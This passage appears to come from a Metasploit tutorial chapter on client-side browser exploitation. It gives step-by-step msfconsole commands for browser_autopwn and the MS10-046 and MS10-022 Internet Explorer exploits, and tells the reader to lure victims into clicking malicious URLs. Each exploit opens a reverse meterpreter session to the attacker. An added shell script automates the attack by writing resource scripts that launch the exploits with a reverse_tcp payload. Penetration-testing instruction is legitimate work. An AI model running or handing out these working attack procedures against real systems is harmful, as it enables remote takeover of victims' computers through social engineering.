Browser vulnerabilities have been known for a very long time, and the browser's frameworks and extensions are often the route to exploitation. There has been recent news of compromises of current versions of browsers such as Chromium, Internet Explorer, and Mozilla Firefox. Malicious code may also exploit plugins such as ActiveX controls, Java, and Flash, which extend the browser to enhance the user experience.
Victims of such exploits may find their homepage, search page, favorites, and bookmarks changed. Settings or Internet options may also be altered to lower the browser's security level, which makes further malware infections more likely.
Tutorial
In the tutorial section, we will show a couple of exploits that run through the victim's browser.
The first exploit we will show is known as browser autopwn. Open a terminal and launch msfconsole, then type in use auxiliary/server/browser_autopwn.
Chapter 6
[ 121 ]
Then type in show options to see in detail all the options that we have to set in the exploit.
In the preceding figure, the Required column shows which options must be set: yes means we have to set the option ourselves, and no means its default can be used. The first required option is LHOST, the address the payload connects back to, so we set it to the attacker's machine IP by typing in set LHOST 192.168.11.23.
Client-side Exploitation
After setting LHOST, the next option is SRVHOST, the local address on which the exploit's web server listens. We set it to our machine's address by typing in set SRVHOST 192.168.11.23.
SRVPORT is the local port the server listens on; set it by typing in set SRVPORT 80. Note that binding port 80 requires root privileges on Linux, so msfconsole must be started as root (or a port of 1024 or above chosen) for the server to come up.
All the settings are done. Now it's time to run the auxiliary module; so type in run.
After the auxiliary module starts, it loads the individual browser exploit modules and their payload handlers on the local host, and prints a malicious URL that we have to deliver to the victim.
This is a simple social engineering technique in which the user is lured into clicking on the malicious URL.
When the URL is opened on the victim's system, autopwn fingerprints the browser, fires the exploits that match it, and the payload opens a reverse connection to the attacker's system. Let us see how this works.
After the URL is opened, we can see in msfconsole that the reverse connection has been established and that the session has migrated into a newly spawned notepad.exe process, PID 1804 in this run. Browser autopwn does this automatically so that the session survives if the exploited browser crashes or is closed.
The notepad.exe process that now hosts the session is visible in the victim's Task Manager.
To check for the meterpreter session that was created, type in sessions.
Now select the meterpreter session to work on the victim's system. The command for selecting a session is sessions -i <Id>; for example, here we use sessions -i 1.
After selecting the session, we are dropped into the meterpreter shell and can continue from there. For example, in the preceding figure the sysinfo command is used to display the system information.
Internet Explorer shortcut icon exploit
Another browser exploit we are going to demonstrate uses shortcut icons that point to a malicious DLL (MS10-046, the Windows Shell .LNK vulnerability CVE-2010-2568). As used here it is a social engineering attack against IE 6 on Windows XP: we only need to lure the victim into opening the link. Launch msfconsole and type in use windows/browser/ms10_046_shortcut_icon_dllloader.
Now type in show options to see in detail all the options that we have to set in the exploit.
The first required option is SRVHOST, the local address on which the exploit's web server listens (the reverse connection address is LHOST, which defaults to the local address of the attacker's machine; set it explicitly if the machine has more than one interface). Set it to the attacker's machine IP by typing in set SRVHOST 192.168.0.109.
Now set SRVPORT, the local port the server listens on, by typing in set SRVPORT 80.
The next option is URIPATH, which we set to its root value by typing in set URIPATH /. These two values are not arbitrary: the module serves the shortcut and the DLL over WebDAV, which only works with SRVPORT 80 and URIPATH /, and the module will not start with other values.
Now all options are set and ready to run the exploit. So type in exploit.
Now it is up to you to do some clever social engineering. Give the URL to the victim and just wait for the reverse connection.
Opening the URL in the browser loads a shortcut icon and a DLL file from our server; when the shell renders the shortcut's icon it loads the DLL, and a meterpreter session appears in msfconsole, meaning our victim has been compromised. Now let us check for sessions by typing in sessions.
We can see here that a session has been created. Now we select the meterpreter session to work on the victim's system. The command for selecting a session is sessions -i <Id>; for example, here we use sessions -i 1.
After selecting the session, we have meterpreter and can go on to further exploitation of the client system.
Internet Explorer malicious VBScript code execution exploit
We have another interesting exploit that is similar to the previous one and targets the same software versions. This time we show a code execution vulnerability (MS10-022) that is triggered when the victim presses the F1 key after a message box, generated by malicious VBScript on a web page, appears: the script supplies a help file hosted on our server, and pressing F1 makes Windows open it with winhlp32.exe, which executes our payload.
To use this exploit, launch msfconsole and type in use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32.
Now type in show options to see all the options that have to be set in the exploit.
The first required option is again SRVHOST, the local address the exploit's web server listens on, so we set it to the attacker's machine IP. For example, here we type in set SRVHOST 192.168.0.105.
Now we set SRVPORT by typing in set SRVPORT 80.
The next option is URIPATH, which we set to its root value by typing in set URIPATH /. As with the previous exploit, the help file is served over WebDAV, so SRVPORT 80 and URIPATH / are required.
Now all the options are set and ready to run the exploit, so type in exploit.
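The three attacker-side setups in this chapter (browser_autopwn, ms10_046_shortcut_icon_dllloader and ms10_022_ie_vbscript_winhlp32) are the same sequence of use, set and run or exploit, and the usual reason a lured click produces no session is a mistyped listener address or a server that could not bind port 80. The POSIX shell script below is an added example, not code from the book or from the Metasploit project: it validates those settings and writes the sequence out as a msfconsole resource script that can be replayed with msfconsole -r. The module and option names (SRVHOST, SRVPORT, URIPATH, LHOST, LPORT, PAYLOAD) are Metasploit's own; the IP addresses, the windows/meterpreter/reverse_tcp payload and LPORT 4444 are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not code from the book or from Metasploit: generate a
# msfconsole resource script for the three browser modules used in this
# chapter, after the sanity checks that most often explain "the victim
# clicked but no session came back". Addresses, payload and LPORT are
# assumptions for the example.

# Succeed only for a syntactically valid dotted-quad IPv4 address.
validate_ipv4() {
  case "$1" in ''|*[!0-9.]*|.*|*.|*..*) return 1 ;; esac
  oldifs=$IFS; IFS=.; set -- $1; IFS=$oldifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do [ "$octet" -le 255 ] || return 1; done
  return 0
}

# Succeed when PORT is numeric and below 1024, i.e. binding it needs root on Unix.
port_is_privileged() {
  case "$1" in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -lt 1024 ]
}

# Print "auxiliary" or "exploit" for the modules this chapter uses; fail otherwise.
module_kind() {
  case "$1" in
    auxiliary/server/browser_autopwn) echo auxiliary ;;
    exploit/windows/browser/ms10_046_shortcut_icon_dllloader) echo exploit ;;
    exploit/windows/browser/ms10_022_ie_vbscript_winhlp32) echo exploit ;;
    *) return 1 ;;
  esac
}

# build_rc MODULE LHOST SRVHOST SRVPORT [URIPATH]  -> resource script on stdout
build_rc() {
  module=$1 lhost=$2 srvhost=$3 srvport=$4 uripath=${5:-/}
  kind=$(module_kind "$module") || { echo "unknown module: $module" >&2; return 1; }
  validate_ipv4 "$lhost"   || { echo "LHOST is not an IPv4 address: $lhost" >&2; return 1; }
  validate_ipv4 "$srvhost" || { echo "SRVHOST is not an IPv4 address: $srvhost" >&2; return 1; }
  # 0.0.0.0 is fine for SRVHOST (listen everywhere) but the victim cannot connect back to it.
  [ "$lhost" != 0.0.0.0 ] || { echo "LHOST must be a reachable address, not 0.0.0.0" >&2; return 1; }
  case "$srvport" in ''|*[!0-9]*) echo "SRVPORT must be numeric: $srvport" >&2; return 1 ;; esac
  # Both exploit modules serve their files over WebDAV, which needs SRVPORT 80
  # and URIPATH /; this is why the chapter sets exactly those values.
  if [ "$kind" = exploit ] && { [ "$srvport" -ne 80 ] || [ "$uripath" != / ]; }; then
    echo "$module needs SRVPORT 80 and URIPATH / (WebDAV)" >&2; return 1
  fi
  if port_is_privileged "$srvport" && [ "$(id -u 2>/dev/null || echo 0)" -ne 0 ]; then
    echo "warning: SRVPORT $srvport is privileged; start msfconsole as root" >&2
  fi
  echo "use $module"
  echo "set SRVHOST $srvhost"
  echo "set SRVPORT $srvport"
  echo "set URIPATH $uripath"
  echo "set LHOST $lhost"
  if [ "$kind" = exploit ]; then
    echo "set PAYLOAD windows/meterpreter/reverse_tcp"   # assumed payload choice
    echo "set LPORT 4444"                                 # assumed handler port
    echo "exploit -j"                                     # background job; console stays free
  else
    echo "run -j"                                         # browser_autopwn is auxiliary
  fi
}

# Stand-alone use: write one script per module, then e.g. "msfconsole -q -r autopwn.rc".
if [ "${1:-}" = --write ]; then
  build_rc auxiliary/server/browser_autopwn 192.168.11.23 192.168.11.23 80 > autopwn.rc
  build_rc exploit/windows/browser/ms10_046_shortcut_icon_dllloader 192.168.0.109 192.168.0.109 80 > ms10_046.rc
  build_rc exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 192.168.0.105 192.168.0.105 80 > ms10_022.rc
fi
```

Run it with --write to produce autopwn.rc, ms10_046.rc and ms10_022.rc, then start a module with msfconsole -q -r autopwn.rc. The exploit modules are started with exploit -j so they run as background jobs and the console stays available for sessions and sessions -i once the victim clicks.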
Next, we use some social engineering to get the victim to open the URL. When the page opens in Internet Explorer, it pops up a message box reading Welcome! Press F1 to dismiss this dialog.
After F1 is pressed, the malicious VBScript runs in the browser and delivers the payload executable, named calc.exe in this run.
When the executable runs, it makes a reverse connection to the attacker machine and a meterpreter session is created. Type in sessions to list the available sessions.
We can see here that a session has been created. Now select the meterpreter session to work on the victim's system. The command for selecting a session is sessions -i <Id>; for example, here we use sessions -i 1.
After selecting the session, we have meterpreter and can go on to further exploitation of the victim machine.
Summary
In this chapter we demonstrated some client-side exploits.
These exploits targeted client systems through the browser, a malicious link, and some social engineering. A golden rule of security is never to click on unknown links, and that is exactly how we got past our victim's defenses. This is the strength of Metasploit: its range of attack vectors is so large that if one does not work against a target, another may. So the recommendation to everyone stands: avoid clicking on unknown links, running unknown executable files, and responding to e-mails from untrusted senders. The next chapter deals with post-exploitation techniques; there are still plenty of exploit tricks to learn.